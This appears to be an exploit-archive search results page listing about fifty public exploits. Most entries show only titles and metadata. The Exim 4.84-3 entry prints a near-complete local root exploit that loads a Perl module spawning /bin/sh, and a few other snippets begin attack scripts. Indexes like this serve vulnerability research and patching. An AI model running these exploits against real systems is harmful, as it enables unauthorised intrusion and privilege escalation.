47904 matches found
Exim 4.84-3 - Local Privilege Escalation
!/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...
jPORTAL 2 - 'humor.php' SQL Injection
. . | / | | \ \ | / / |\ \ \ |/ // / /\ \ / |/ \ / // | / | | / \ /|\ / / / / \ / \ / / / \ | | /\ /\ / \ | \ // est.2007 / / forum.darkc0de.com --d3hydr8 -rsauron-baltazar -sinner01 -C1c4Tr1Z - beenu -QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz and all darkc0de members...
Pymatgen 2024.1 - Remote Code Execution (RCE)
Exploit Title : Pymatgen 2024.1 - Remote Code Execution RCE Google Dork : not applicable Date : 2024-11-13 Exploit Author : Mohammed Idrees Banyamer Vendor Homepage : https ://pymatgen.org Software Link : https ://pypi.org /project /pymatgen/ Version : 2024.1 Tested on : Kali Linux 2024.1 CVE :...
Aquatronica Control System 5.1.6 - Information Disclosure
!/usr/bin/env python -- coding: utf-8 -- Aquatronica Control System 5.1.6 Passwords Leak Vulnerability Vendor: Aquatronica s.r.l. Product web page: https://www.aquatronica.com Affected version: Firmware: 5.1.6 Web: 2.0 Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy to use, allowing...
TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vendor: Telecomunicazioni Elettro Milano TEM S.r.l. Product web page: https://www.tem-italy.it Affected version: Software version: 35.45 Webserver version: 1.7 Summary: This new line of Opera plus FM Transmitters combines very high...
Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting XSS Date: 15 May 2023 Exploit Author: Astik Rawat ahrixia Vendor Homepage: https://qloapps.com/ Software Link: https://github.com/webkul/hotelcommerce Version: 1.5.2 Tested on: Kali Linux 2022.4 CVE : CVE-2023-30256 Description: A Cross...
Optoma 1080PSTX Firmware C02 - Authentication Bypass
Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass Date: 2023/05/09 Exploit Author: Anthony Cole Contact: http://twitter.com/acole76 Website: http://twitter.com/acole76 Vendor Homepage: http://optoma.com Version: Optoma 1080PSTX Firmware C02 Tested on: N/A CVE : CVE-2023-27823...
NotrinosERP 0.7 - Authenticated Blind SQL Injection
Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection Date: 11-03-2023 Exploit Author: Arvandy Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7 Vendor Homepage:...
EasyNas 1.1.0 - OS Command Injection
Exploit Title: EasyNas 1.1.0 - OS Command Injection Date: 2023-02-9 Exploit Author: Ivan Spiridonov [email protected] Author Blog: https://xbz0n.medium.com Version: 1.0.0 Vendor home page : https://www.easynas.org Authentication Required: Yes CVE : CVE-2023-0830 !/usr/bin/python3 import...
Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting XSS Exploit Author: Mohammed A.Siledar Author Company : reprisesoftware Version: rlm.v14.2BL4 Vendor home page : https://reprisesoftware.com Software Link:...
Magento eCommerce CE v2.3.5-p2 - Blind SQLi
Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi Date: 2021-4-21 Exploit Author: Aydin Naserifard Vendor Homepage: https://www.adobe.com/ Software Link: https://github.com/magento/magento2/releases/tag/2.3.5-p2 Version: 2.3.5-p2 Tested on: 2.3.5-p2 POC: 1PUT...
Tagstoo 2.0.1 - Persistent Cross-Site Scripting
Exploit Title: Tagstoo 2.0.1 - Stored XSS to RCE Exploit Author: TaurusOmar Date: 04/05/2021 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Risk: High 8.8 Vendor Homepage: https://tagstoo.sourceforge.io/ Version: v2.0.1 Tested on: Windows, Linux, MacOs Software Description: Software to tag folders...
Online Shopping Cart System 1.0 - 'id' SQL Injection
Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection Date: 14.1.2021 Exploit Author: Aydın Baran Ertemir Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html Software Link:...
WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection Unauthenticated Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt Date: 2020-07-20 Exploit Author: KBAZ@SOGETIESEC Vendor Homepage: https://www.icegram.com/email-subscribers/...
Bio Star 2.8.2 - Local File Inclusion
Exploit Title: Bio Star 2.8.2 - Local File Inclusion Authors: SITE Team Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi Google Dork: N/A Date of Exploit Release: 2020-07-13 Exploit Author: SITE Team Vendor Homepage: https://www.supremainc.com/en/main.asp Software Link:...
Car Park Management System 1.0 - Authentication Bypass
Exploit Title: Car Park Management System 1.0 - Authentication Bypass Date: 2020-05-07 Exploit Author: Tarun Sehgal Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip Version: 1.0...
Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation Date: 2019-12-18 Exploit Author: Vulnerability-Lab Vendor Homepage: https://www.bahn.de/dbvertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml Tested on: Windows XP Document Title: ===============...
Hospital-Management 1.26 - 'fname' SQL Injection
Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection Author: Cakes Discovery Date: 2019-09-18 Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip Tested Version: 1.26 Tested on OS...
GetGo Download Manager 6.2.2.3300 - Denial of Service
Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service Date: 2019-08-15 Author - Malav Vyas Vulnerable Software: GetGo Download Manager 6.2.2.3300 Vendor Home Page: www.getgosoft.com Software Link: http://www.getgosoft.com/getgodm/ Tested On: Windows 7 64Bit, Windows 10 64Bit Attac...
CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities
Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities. Shodan query: /config/logoffpage.html Discovered Date: 07/03/2014 Reported Date: 08/04/2019 Exploit Author: Ramikan Website: http://fact-in-hack.blogspot.com Vendor...
phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution
!/usr/bin/env python """cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author: https://twitter.com/iamsecurity run: ./cve-2016-5734.py -u root...
Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass
source: https://www.securityfocus.com/bid/56837/info MySQL and MariaDB are prone to a security-bypass weakness. An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible. use Net::MySQL; $|=1; my $mysql = Net::MySQL-new hostname = '192.168.2.3...
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)
!/bin/sh EDB Note: Updated exploit https://www.exploit-db.com/exploits/14339/ Exploit Title: Ubuntu PAM MOTD file tampering privilege escalation Date: July 7, 2010 Author: Kristian Erik Hermansen Software Link: http://packages.ubuntu.com/ Version: pam-1.1.0 Tested on: Ubuntu 10.04 LTS Lucid Lynx...
Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied inp...
Sitefinity 15.0 - Cross-Site Scripting (XSS)
Exploit Title: Sitefinity 15.0 - Cross-Site Scripting XSS Date: 2023-12-05 Exploit Author: Aldi Saputra Wahyudi Vendor Homepage: https://www.progress.com/sitefinity-cms Version:...
Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path Date: 2024-04-2 Exploit Author: Saud Alenazi Vendor Homepage: https://www.rapid7.com/ Software Link: https://www.rapid7.com/products/nexpose/ Version: 6.6.240 Tested: Windows 10 x64 Step to discover Unquoted Service Path:...
GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
ADVISORY INFORMATION Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin Date of found: 11 Jun 2022 Application: GLPI Manageentities 4.0.2 Author: Nuri Çilengir Vendor Homepage: https://glpi-project.org/ Software Link:...
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
!/usr/bin/env Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE Date: 22-01-2023 Exploit Author: BLY Vendor Homepage: https://wpscan.com/vulnerability/10389 Version: File Manager plugin 6.0-6.9 Tested on: Debian CVE : CVE-2020-25213 import...
Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting XSS Author: Bleron Rrustemi Discovery Date: 2022-11-15 Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/ Datasheet:: https://www.uniview.com/download.do?id=1761643 Device Firmware:...
Simple Attendance System 1.0 - Authenticated bypass
Exploit Title: Simple Attendance System 1.0 - Authenticated bypass Exploit Author: Abdullah Khawaja hax.3xploit Date: September 17, 2021 Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html Software Link:...
Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)
Exploit Title: Compro Technology IP Camera - RTSP stream disclosure Unauthenticated Date: 2021-09-30 Exploit Author: icekam,xiao13,Rainbow,tfsec Software Link: http://www.comprotech.com.hk/ Version: Compro IP70 2.087130218, IP570 2.087130520, IP60, TN540 CVE : CVE-2021-40379 Some devices have...
Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection Date: 29.07.2021 Exploit Author: securityforeveryone.com Vendor Homepage: https://care2x.org Software Link: https://sourceforge.net/projects/care2002/ Version: = 2.7 Alpha Tested on: Linux/Windows Researchers :...
WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)
Exploit Title: WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting XSS Date: 11/07/2021 Exploit Author: Swapnil Subhash Bodekar Vendor Homepage: Software Link: https://wordpress.org/plugins/wpfront-notification-bar/ Version: 1.9.1.04012 Tested on Windows Category:...
Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path
Exploit Title: Brother BRAgent 1.38 - 'WBAAgentClient' Unquoted Service Path Discovery by: Brian Rodriguez Date: 14-06-2021 Vendor Homepage: https://brother.com Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000wus&os=10013&dlid=dlf002778000&flang=4&type3=...
Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal
Exploit Title: Ruijie Networks Switch eWeb S29RGOS 11.4 - Directory Traversal Exploit Author: Tuygun Date: 2020-08-19 Vendor Homepage: https://www.ruijienetworks.com/ Version: eWeb S29RGOS 11.41B12P11 Source : https://faruktuygun.com/directorytraversal.html Proof of Concept Request: GET...
Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow SEH Date: 2020-07-26 Author: Felipe Winsnes Software Link: https://nidesoft-dvd-ripper.softonic.com/ Version: 5.2.18 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Proof of Concept: 1.- Run the python script, it will...
CompleteFTP Professional 12.1.3 - Remote Code Execution
Exploit Title: CompleteFTP Professional 12.1.3 - Remote Code Execution Date: 2020-03-11 Exploit Author: 1F98D Original Author: Rhino Security Labs Vendor Homepage: https://enterprisedt.com/products/completeftp/ Version: CompleteFTP Professional Tested on: Windows 10 x64 CVE: CVE‑2019‑16116...
ZenTao Pro 8.8.2 - Command Injection
Exploit Title: ZenTao Pro 8.8.2 - Command Injection Date: 2020-07-01 Exploit Author: Daniel Monzón & Melvin Boers Vendor Homepage: https://www.zentao.pm/ Version: 8.8.2 Tested on: Windows 10 / WampServer Other versions like pro or enterprise edition could be affected aswell Netcat is needed to us...
Joplin Desktop 1.0.184 - Cross-Site Scripting
Exploit Title: Joplin Desktop 1.0.184 - Cross-Site Scripting Exploit Author: Javier Olmedo Date: 2020-02-27 Vendor: Laurent Cozic Software Link: https://github.com/laurent22/joplin/archive/v1.0.184.zip Affected Version: 1.0.184 and before Patched Version: 1.0.185 Category: Remote Platform: Window...
Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings
-----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType to some...
Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 HttpClients::IE,...
BIND 9.x - Remote DNS Cache Poisoning
from scapy import import random Copyright C 2008 Julien Desfossez http://www.solisproject.net/ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, o...
Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Squid NTLM...
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution RCE Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.04 Summary: ASPECT is an award-winning scalable building energy management...
Blood Bank v1.0 - Stored Cross Site Scripting (XSS)
Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting XSS Date: 2023-11-14 Exploit Author: Ersin Erenler Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code Software Link: https://download-media.code-projects.org/2020/11/BloodBankInPHPWithSourcecode.zip Version: 1.0...
Screen SFT DAB 600/C - Authentication Bypass Password Change
!/usr/bin/env python3 Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change Exploit Author: LiquidWorm Vendor: DB Elettronica Telecomunicazioni SpA Product web page: https://www.screen.it | https://www.dbbroadcast.com...
Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking Author: nu11secur1ty Date: 02.23.2023 Vendor: https://www.kimai.org/ Software: https://github.com/kimai/kimai/releases/tag/1.30.10 Reference:...
WPForms 1.7.8 - Cross-Site Scripting (XSS)
Exploit Title: WPForms 1.7.8 - Cross-Site Scripting XSS Date: 2022-12-05 Author: Milad karimi Software Link: https://wordpress.org/plugins/wpforms-lite Version: 1.7.8 Tested on: Windows 10 CVE: N/A 1. Description: This plugin creates a WPForms from any post types. The slider import search feature...
DLINK DIR850 - Open Redirect
Exploit Title: DLINK DIR850 - Open Redirect Product: Dlink Model: DIR850 Date: 14/1/2022 CVE: CVE-2021-46379 Exploit Author: AhmedAlroky Hardware version: b1 Firmware version: ET850-1.08TRb03 Vendor home page: https://www.dlink.com/ Exploit : Visit...
Xiaomi browser 10.2.4.g - Browser Search History Disclosure
Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure Date: 27-Dec-2018 Exploit Author: Vishwaraj101 Vendor Homepage: https://www.mi.com/us Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/ Version: 10.2.4.g Tested on: Tested in Andro...